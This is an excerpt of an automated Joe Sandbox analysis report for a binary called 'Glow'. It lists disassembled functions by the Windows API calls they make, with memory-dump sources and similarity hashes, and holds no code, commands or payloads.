                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                          • Opcode ID: 8d318178a1b533d9eab9a802e66539bd49c3ab581b3adccd9cb5b65d54fe4a97
                                                                                                                                                                          • Instruction ID: 542cf8908a1dac9ff035d9a829038ffeaa55c773a8d6cc00c396c3661627a5e8
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d318178a1b533d9eab9a802e66539bd49c3ab581b3adccd9cb5b65d54fe4a97
                                                                                                                                                                          • Instruction Fuzzy Hash: 77A1B171A00301AFE721EF24C886B2AB7E5AF44710F54886DF5599B3D2D775EC41CB86
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C505
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040C560
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0040C5C3
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0040C606
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040C613
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                          • Opcode ID: 77503109a618e388db9bceb6ccec267e9639bcad4ad87c5b7675102a2049590a
                                                                                                                                                                          • Instruction ID: fd258e31dc699d7d3224a4efda63329eaeb7bd95ade6ba9e6f580e4d2b16ad6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 77503109a618e388db9bceb6ccec267e9639bcad4ad87c5b7675102a2049590a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2661A075108241EFC314DF14C890E6ABBE5FF84308F5489ADF4969B292CB35ED46CB96
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003ED7CD,?), ref: 003EE714
                                                                                                                                                                            • Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003ED7CD,?), ref: 003EE72D
                                                                                                                                                                            • Part of subcall function 003EEAB0: GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003EED8A
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 003EEDC3
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003EEF02
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003EEF1A
                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 003EEF67
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                          • Opcode ID: 624fdeff5df959454840fd55420a7cb97836ca52c94114640416b5f030191ed8
                                                                                                                                                                          • Instruction ID: d49a06b0977cfd808e799a084d344d8f2f5515080bc2837c9c128c23db9acb79
                                                                                                                                                                          • Opcode Fuzzy Hash: 624fdeff5df959454840fd55420a7cb97836ca52c94114640416b5f030191ed8
                                                                                                                                                                          • Instruction Fuzzy Hash: 485174B24083959FC726EB91CC819DBB3ECEF85310F004A2EF285D7191EF71A6888756
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 003E9534
                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 003E95A5
                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 003E9604
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 003E9677
                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003E96A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                          • Opcode ID: e473214e2b91ece6470f2dd46175811ac831526697d37b8720edb9fce51021e3
                                                                                                                                                                          • Instruction ID: e629a4c57b75e2fecf51d56e110a7fdea97620871cf5c204b1f8dd49c2d04243
                                                                                                                                                                          • Opcode Fuzzy Hash: e473214e2b91ece6470f2dd46175811ac831526697d37b8720edb9fce51021e3
                                                                                                                                                                          • Instruction Fuzzy Hash: CE514AB5A00259EFCB15CF59C884EAAB7F8FF89314B15856AE905DB350E730E911CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003F95F3
                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003F961F
                                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003F9677
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003F969C
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003F96A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                          • Opcode ID: 6bdc5bab13d749c14c746c485aaa13909c59a238dbfa548715e07bc98bfd9820
                                                                                                                                                                          • Instruction ID: 121b5dead2093d8ec1249e6718f4f73473b3916b8a0582fac90706f3c074fa76
                                                                                                                                                                          • Opcode Fuzzy Hash: 6bdc5bab13d749c14c746c485aaa13909c59a238dbfa548715e07bc98bfd9820
                                                                                                                                                                          • Instruction Fuzzy Hash: F8512F75A002199FCB06EF65C881AA9BBF5FF49314F058099E949AF362CB35ED41CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0040999D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00409A2D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409A49
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00409A8F
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00409AAF
                                                                                                                                                                            • Part of subcall function 0039F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003F1A02,?,753CE610), ref: 0039F9F1
                                                                                                                                                                            • Part of subcall function 0039F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,003E0354,00000000,00000000,?,?,003F1A02,?,753CE610,?,003E0354), ref: 0039FA18
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                          • Opcode ID: 611c1f9c89ec169824c9c1a04801f0837de3a2c92cf672a2a29002127c3a0d9a
                                                                                                                                                                          • Instruction ID: be366ffca550e40da46bcd1e47e7b0988ba6691c1341f9c681b7d32b0454329b
                                                                                                                                                                          • Opcode Fuzzy Hash: 611c1f9c89ec169824c9c1a04801f0837de3a2c92cf672a2a29002127c3a0d9a
                                                                                                                                                                          • Instruction Fuzzy Hash: B3515C75A00245DFCB01EF68C48499ABBF0FF09314B1581A9E80AAF762D735ED86CF95
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0041766B
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00417682
                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004176AB
                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003FB5BE,00000000,00000000), ref: 004176D0
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004176FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                          • Opcode ID: 8cb545cf00243c939a2a9b725dc4aedc5cd84ae62faa84acc78e4d7cef573142
                                                                                                                                                                          • Instruction ID: cd4b702945b24a3bf64004857bc374b003c6c98b6dc11460a5846365d6986ae9
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cb545cf00243c939a2a9b725dc4aedc5cd84ae62faa84acc78e4d7cef573142
                                                                                                                                                                          • Instruction Fuzzy Hash: 2041C275A08604AFD7259F2CCC48FE67B75EB09360F150266F819A73E0C778AD81D658
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 7537bbe4e368d568ab32f35f479f9e27fcf3a61c46db4d016460cb421f994e28
                                                                                                                                                                          • Instruction ID: 4e6045390856cef1303ffd3f587e9edb33c2f0c0c8764943266b831e8de39c36
                                                                                                                                                                          • Opcode Fuzzy Hash: 7537bbe4e368d568ab32f35f479f9e27fcf3a61c46db4d016460cb421f994e28
                                                                                                                                                                          • Instruction Fuzzy Hash: FF41D636E002009FCB25DF79C881A9EB7E5EF89318F1546A8E615EB755D731AD01CB80
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 003E2262
                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 003E230E
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 003E2316
                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 003E2327
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003E232F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                          • Opcode ID: 771ef5ab5dc335fdcdd397245b26d06e018c897fca979c13549f3876db5e8246
                                                                                                                                                                          • Instruction ID: 3d605055a99b36b9343d0e01f61dec3f5a24ddd3e922e46d677ff1081c204d98
                                                                                                                                                                          • Opcode Fuzzy Hash: 771ef5ab5dc335fdcdd397245b26d06e018c897fca979c13549f3876db5e8246
                                                                                                                                                                          • Instruction Fuzzy Hash: FB31B171900269EFDB15CFA8CD89BDE3BB9EB04315F104725FA25AB2D0C770A944DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,003FCC63,00000000), ref: 003FD97D
                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 003FD9B4
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,003FCC63,00000000), ref: 003FD9F9
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,003FCC63,00000000), ref: 003FDA0D
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,003FCC63,00000000), ref: 003FDA37
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                          • Opcode ID: 3aa656923be2ca137527d7956d5132a6249d8fab1009043c80e8c82c763f16e7
                                                                                                                                                                          • Instruction ID: e9c58fa3bd0f2507c20484419d42ea2b3dffd5c8a90e2d86cbc4cc20e7c9a0d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 3aa656923be2ca137527d7956d5132a6249d8fab1009043c80e8c82c763f16e7
                                                                                                                                                                          • Instruction Fuzzy Hash: D6317AB1904209EFDB26DFA5D888EBBBBF9EB00350B10842EE646D7140D770EE409B64
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004161E4
                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0041623C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041624E
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00416259
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 004162B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                          • Opcode ID: b67596a588f4672903a0ecf1026bb1f5f1586d06f2b0271b35d695ac52e4eb40
                                                                                                                                                                          • Instruction ID: 83b89316c86e9b3d6096ea0a8d8b7772ad5f9298d7016d9a4a823d5dc32542b1
                                                                                                                                                                          • Opcode Fuzzy Hash: b67596a588f4672903a0ecf1026bb1f5f1586d06f2b0271b35d695ac52e4eb40
                                                                                                                                                                          • Instruction Fuzzy Hash: AE217171900218AADB119FA4CC84AEE77B9FB45324F108257F925EA280D778D9C6CF59
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 004013AE
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004013C5
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00401401
                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 0040140D
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00401445
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                          • Opcode ID: 09ca2c7e3cf1f86247dc523b05b7a19773e12b4e32cd623350cf0731067bd52f
                                                                                                                                                                          • Instruction ID: cb3cb8832f2d28c4a2725fc35e17f89222d63f3dc47927b801ca90d96c8cfe56
                                                                                                                                                                          • Opcode Fuzzy Hash: 09ca2c7e3cf1f86247dc523b05b7a19773e12b4e32cd623350cf0731067bd52f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E219076A00214AFD704EF65CC94AAEB7F9EF48340B048479F85ADB761CB30AC00CB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 003BD146
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003BD169
                                                                                                                                                                            • Part of subcall function 003B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003BD18F
                                                                                                                                                                          • _free.LIBCMT ref: 003BD1A2
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003BD1B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: 5c3d97883b504bebe164cff99499fb45e4da28480385be25087025a08e73f5e5
                                                                                                                                                                          • Instruction ID: ec3ae441c1adb147b33e4e8c4eba89ece16c56797e57f2d7af157e05a9820254
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c3d97883b504bebe164cff99499fb45e4da28480385be25087025a08e73f5e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B01F7B6A026197F336266BE5C8CCFB7A6DDEC2B693150229FE15C6644FA708D0181B4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,003AF64E,003A545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 003B3170
                                                                                                                                                                          • _free.LIBCMT ref: 003B31A5
                                                                                                                                                                          • _free.LIBCMT ref: 003B31CC
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 003B31D9
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 003B31E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
